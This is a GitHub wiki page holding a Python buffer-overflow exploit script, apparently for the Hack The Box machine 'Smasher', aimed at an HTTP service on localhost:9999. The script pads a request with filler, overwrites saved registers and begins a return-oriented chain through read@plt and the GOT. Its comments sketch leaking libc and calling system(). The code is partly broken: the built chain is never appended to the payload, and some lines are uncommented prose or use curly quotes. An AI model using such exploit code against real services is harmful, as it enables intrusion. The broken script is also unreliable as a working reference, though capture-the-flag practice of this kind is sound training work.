smasher - adydawkins/htb-rabbit GitHub Wiki

#!/usr/bin/python

import os, sys, socket

import struct

import requests

#cmd = sys.argv[1]+"\0"

cmd = 'ls'

#payload for Option 1: GET request, needs some filler or err - 'A' * 4 to be taken off buffer

payload = r’http://localhost:9999/\AAAA'

#Payload for Option 2: CURL

#payload = ''

#filler - fill buffer with A’s , thought this would be 536 - 4, but turns out to be 535

payload += 'A' * (535 - 4)

#overwrite RBX

payload += 'B' * 8

#overwrite RBP

payload += 'C' * 8

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)

someother = struct.pack("<I", 0x000400cf0) #read() call loc

someother += struct.pack("<I", 0x000401787) #PPPR

someother += struct.pack("<I", 0) #stdin

someother += struct.pack("<I", 0x000602e28) #.dynamic addr

someother += struct.pack("<I", len(cmd)) #len of cmd

#leak address of read() in randomised libc

#call read@plt to overwrite the ptr stored in GOT

#call read@plt with address of system() in libc

#padding - continue filler, writing into RSP

payload += 'D' * 150

Payload delivery Option1: requests.get

r = requests.get(payload)

print(r.status_code)

print(len(payload))

Payload delivery Option2: system cmd curl

#print("Sending payload of total length {}".format(len(payload))) #system("/usr/bin/curl -g localhost:9999/\"" +payload + "\"")

⚠️ **GitHub.com Fallback** ⚠️